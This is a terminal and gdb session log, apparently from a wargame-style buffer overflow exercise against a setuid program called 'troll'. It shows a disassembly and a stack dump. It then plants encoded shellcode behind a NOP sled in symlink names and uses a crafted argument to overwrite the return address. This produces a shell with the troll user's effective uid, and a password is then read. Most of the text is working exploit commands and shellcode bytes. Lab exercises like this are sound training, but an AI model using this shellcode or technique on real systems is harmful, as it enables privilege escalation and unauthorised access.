---Type <return> to continue, or q <return> to quit---
0x80485a6 <main+166>:	call   0x8048420 <exit>
0x80485ab <main+171>:	add    %esp,4
0x80485ae <main+174>:	mov    %esi,%esi
0x80485b0 <main+176>:	mov    %eax,DWORD PTR [%ebp+12]
0x80485b3 <main+179>:	add    %eax,4
0x80485b6 <main+182>:	mov    %edx,DWORD PTR [%eax]
0x80485b8 <main+184>:	push   %edx
0x80485b9 <main+185>:	call   0x80483f0 <strlen>
0x80485be <main+190>:	add    %esp,4
0x80485c1 <main+193>:	mov    %eax,%eax
0x80485c3 <main+195>:	cmp    %eax,48
0x80485c6 <main+198>:	jbe    0x80485e0 <main+224>
0x80485c8 <main+200>:	push   0x80486c0
0x80485cd <main+205>:	call   0x8048410 <printf>
0x80485d2 <main+210>:	add    %esp,4
0x80485d5 <main+213>:	push   0
0x80485d7 <main+215>:	call   0x8048420 <exit>
0x80485dc <main+220>:	add    %esp,4
0x80485df <main+223>:	nop    
0x80485e0 <main+224>:	mov    %eax,DWORD PTR [%ebp+12]
0x80485e3 <main+227>:	add    %eax,4
0x80485e6 <main+230>:	mov    %edx,DWORD PTR [%eax]
0x80485e8 <main+232>:	push   %edx
0x80485e9 <main+233>:	lea    %eax,[%ebp-40]
0x80485ec <main+236>:	push   %eax
0x80485ed <main+237>:	call   0x8048440 <strcpy>
0x80485f2 <main+242>:	add    %esp,8
0x80485f5 <main+245>:	lea    %eax,[%ebp-40]
0x80485f8 <main+248>:	push   %eax
0x80485f9 <main+249>:	push   0x80486d7
0x80485fe <main+254>:	call   0x8048410 <printf>
0x8048603 <main+259>:	add    %esp,8
0x8048606 <main+262>:	push   40
0x8048608 <main+264>:	push   0
0x804860a <main+266>:	lea    %eax,[%ebp-40]
0x804860d <main+269>:	push   %eax
0x804860e <main+270>:	call   0x8048430 <memset>
0x8048613 <main+275>:	add    %esp,12
0x8048616 <main+278>:	mov    %eax,DWORD PTR [%ebp+12]
0x8048619 <main+281>:	add    %eax,4
0x804861c <main+284>:	mov    %edx,DWORD PTR [%eax]
0x804861e <main+286>:	push   %edx
0x804861f <main+287>:	call   0x80483f0 <strlen>
0x8048624 <main+292>:	add    %esp,4
0x8048627 <main+295>:	mov    %eax,%eax
0x8048629 <main+297>:	push   %eax
0x804862a <main+298>:	push   0
0x804862c <main+300>:	mov    %eax,DWORD PTR [%ebp+12]
0x804862f <main+303>:	add    %eax,4
0x8048632 <main+306>:	mov    %edx,DWORD PTR [%eax]
0x8048634 <main+308>:	push   %edx
---Type <return> to continue, or q <return> to quit---
0x8048635 <main+309>:	call   0x8048430 <memset>
0x804863a <main+314>:	add    %esp,12
0x804863d <main+317>:	leave  
0x804863e <main+318>:	ret    
0x804863f <main+319>:	nop    
End of assembler dump.
(gdb) b *main+237
Breakpoint 1 at 0x80485ed
(gdb) r `python -c 'print "\x90"*44+"\xbf"*4'`
Starting program: /home/orge/tmp/./?1?2ly???yyy2i00tii0cjo??
                                                              ? `python -c 'print "\x90"*44+"\xbf"*4'`
Xshell
Breakpoint 1, 0x80485ed in main ()
(gdb) x/512x $esp
0xbffff8b4:	0xbffff8c0	0xbffffb33	0x00000017	0xbffff8e8
0xbffff8c4:	0x4000a970	0x400f855b	0x080496fc	0x4000ae60
0xbffff8d4:	0xbffff934	0xbffff8e8	0x080484eb	0x080496e8
0xbffff8e4:	0x080496fc	0xbffff908	0x400309cb	0x00000002
0xbffff8f4:	0xbffff934	0xbffff940	0x40013868	0x00000002
0xbffff904:	0x08048450	0x00000000	0x08048471	0x08048500
0xbffff914:	0x00000002	0xbffff934	0x08048390	0x0804866c
0xbffff924:	0x4000ae60	0xbffff92c	0x40013e90	0x00000002
0xbffff934:	0xbffffa29	0xbffffb33	0x00000000	0xbffffb64
0xbffff944:	0xbffffb86	0xbffffb90	0xbffffb9e	0xbffffbbd
0xbffff954:	0xbffffbca	0xbffffbe1	0xbffffbfb	0xbffffc1a
0xbffff964:	0xbffffc25	0xbffffc33	0xbffffc73	0xbffffc85
0xbffff974:	0xbffffc95	0xbffffcaa	0xbffffcba	0xbffffcc4
0xbffff984:	0xbffffce0	0xbffffcf8	0xbffffd03	0xbffffd14
0xbffff994:	0xbffffd27	0xbffffd2f	0x00000000	0x00000003
0xbffff9a4:	0x08048034	0x00000004	0x00000020	0x00000005
0xbffff9b4:	0x00000006	0x00000006	0x00001000	0x00000007
0xbffff9c4:	0x40000000	0x00000008	0x00000000	0x00000009
0xbffff9d4:	0x08048450	0x0000000b	0x000001fb	0x0000000c
0xbffff9e4:	0x000001fb	0x0000000d	0x000001fb	0x0000000e
0xbffff9f4:	0x000001fb	0x00000010	0x0febfbff	0x0000000f
0xbffffa04:	0xbffffa24	0x00000000	0x00000000	0x00000000
0xbffffa14:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffa24:	0x36383669	0x6f682f00	0x6f2f656d	0x2f656772
0xbffffa34:	0x2f706d74	0x90902f2e	0x90909090	0x90909090
0xbffffa44:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffa54:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffa64:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffa74:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffa84:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffa94:	0x90909090	0x90909090	0x11eb9090	0xb1c9315e
0xbffffaa4:	0x0e6c8032	0xe98001ff	0xebf67501	0xffeae805
0xbffffab4:	0xc132ffff	0x30306951	0x30696974	0x8a6f6a63
0xbffffac4:	0x8a5451e4	0x0cb19ae2	0x909081ce	0x90909090
0xbffffad4:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffae4:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffaf4:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb04:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb14:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb24:	0x90909090	0x90909090	0x90909090	0x90009090
0xbffffb34:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb44:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb54:	0x90909090	0x90909090	0xbf909090	0x00bfbfbf
0xbffffb64:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb74:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb84:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb94:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffba4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbb4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbc4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbd4:	0x00000000	0x00000000	0x00000000	0x00000000
---Type <return> to continue, or q <return> to quit---
0xbffffbe4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbf4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc04:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc14:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc24:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc34:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc44:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc54:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc64:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc74:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc84:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc94:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffca4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcb4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcc4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcd4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffce4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcf4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd04:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd14:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd24:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd34:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd44:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd54:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd64:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd74:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd84:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd94:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffda4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffdb4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffdc4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffdd4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffde4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffdf4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe04:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe14:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe24:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe34:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe44:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe54:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe64:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe74:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe84:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe94:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffea4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffeb4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffec4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffed4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffee4:	0x00000000	0x00000000	0x00000000	0x682f0000
0xbffffef4:	0x2f656d6f	0x6567726f	0x706d742f	0x902f2e2f
0xbfffff04:	0x90909090	0x90909090	0x90909090	0x90909090
---Type <return> to continue, or q <return> to quit---
0xbfffff14:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffff24:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffff34:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffff44:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffff54:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffff64:	0xeb909090	0xc9315e11	0x6c8032b1	0x8001ff0e
0xbfffff74:	0xf67501e9	0xeae805eb	0x32ffffff	0x306951c1
0xbfffff84:	0x69697430	0x6f6a6330	0x5451e48a	0xb19ae28a
0xbfffff94:	0x9081ce0c	0x90909090	0x90909090	0x90909090
0xbfffffa4:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffffb4:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffffc4:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffffd4:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffffe4:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffff4:	0x90909090	0x00909090	0x00000000	Cannot access memory at address 0xc0000000
(gdb) q
The program is running.  Exit anyway? (y or n) y
[orge@localhost tmp]$ cd ..
[orge@localhost orge]$ ls
tmp
troll
troll.c
?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????1?2?l?y?????—þy2i00tii0cjo?????? 
[orge@localhost orge]$ ln -s troll `python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+"\x90"*100'`
[orge@localhost orge]$ ./`python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+"\x90"*100'`
argc must be two!
[orge@localhost orge]$ ./`python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+"\x90"*100'` `python -c 'print "\x90"*44+"\x44\xff\xff\xbf"'`
Dyy¢¯
bash$ id
uid=507(orge) gid=507(orge) euid=508(troll) egid=508(troll) groups=507(orge)
bash$ my-pass
euid = 508
[????????????????]
bash$